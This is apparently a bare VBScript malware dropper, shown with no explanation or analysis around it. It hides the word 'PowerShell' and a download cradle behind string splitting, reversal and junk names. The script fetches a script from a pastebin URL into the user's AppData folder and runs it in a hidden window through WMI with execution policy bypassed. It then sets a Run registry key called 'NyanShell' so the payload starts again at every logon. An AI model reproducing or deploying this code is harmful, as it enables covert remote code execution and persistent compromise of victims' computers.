xotao


startupfolder="C:\Users\"+CreateObject(rev("krowteN.tpircSW")).UserName+"\AppData\Roaming\VHF.ps1"


MaURL="https://pastebin.com/raw/1it5wZYJ"

Gatilho="Pow@#$er@#$sh@#$ell"

Sparador = Split(Gatilho, "@#$")

s=Sparador(0)+Sparador(1)+Sparador(2)+Sparador(3)

gshjgjshsjhsusyuiweiwuwiuwiuiww = s + " $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://pastebin.com/raw/1it5wZYJ'',$env:APPDATA+''\\''+''VHF.ps1'')'|D|D"

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set yeteuyeuehjehejehjehejenhjehejhejhejehje = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = yeteuyeuehjehejehjehejenhjehejhejhejehje.SpawnInstance_
objConfig.ShowWindow = 0

Set objProcess = objWMIService.Get("Win32_Process")
intReturn = objProcess.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, Null, objConfig, intProcessID)

Set objShell = CreateObject("Wscript.shell")
objShell.run("powershell -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder)
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NyanShell","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder,"REG_SZ"


Public Function sHexDecode(sData)
 Dim sOutString
 Dim sTmpChar
 For iChar = 1 To Len(sData) Step 2
sTmpChar = Chr("&H" & Mid(sData, iChar, 2))
sOutString = sOutString & sTmpChar
Next
 sHexDecode = sOutString
End Function
Function rev(Str)
dsd="f"
ggh="gr"

If dsd = ddg Then


else

For i = Len(Str) To 1 Step -1
    Var = Mid(Str, i, 1)
   reverseString = reverseString & Var
Next
rev = reverseString

End if
End Function


Function rev(Str)
dsd="f"
ggh="gr"

If dsd = ddg Then


else

For i = Len(Str) To 1 Step -1
    Var = Mid(Str, i, 1)
   reverseString = reverseString & Var
Next
rev = reverseString

End if
End Function